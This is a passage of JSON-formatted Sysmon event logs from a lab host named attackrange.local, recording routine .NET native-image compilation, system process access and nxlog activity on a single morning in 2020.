{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:52.544\r\nProcessGuid: {E2A3D6B1-135F-5F25-0000-0010A84C0E00}\r\nProcessId: 4160\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1040-0\\System.Data.Entity.Design.dll\r\nCreationUtcTime: 2020-08-01 07:01:52.544","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:52.544","ProcessGuid":"{E2A3D6B1-135F-5F25-0000-0010A84C0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1040-0\\System.Data.Entity.Design.dll","CreationUtcTime":"2020-08-01 07:01:52.544","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:52.591\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010F1CA0C00}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:52.591","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010F1CA0C00}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:52.591\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010F1CA0C00}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:52.591","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010F1CA0C00}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:52.607\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1360-5F25-0000-0010D8510E00}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:52.607","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1360-5F25-0000-0010D8510E00}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:52.779\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:52.779","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:52.779\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1360-5F25-0000-0010BD550E00}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:52.779","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1360-5F25-0000-0010BD550E00}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:52.779\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1360-5F25-0000-0010BD550E00}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:52.779","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1360-5F25-0000-0010BD550E00}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:52.779\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1360-5F25-0000-0010BD550E00}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:52.779","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1360-5F25-0000-0010BD550E00}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:53.779\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files 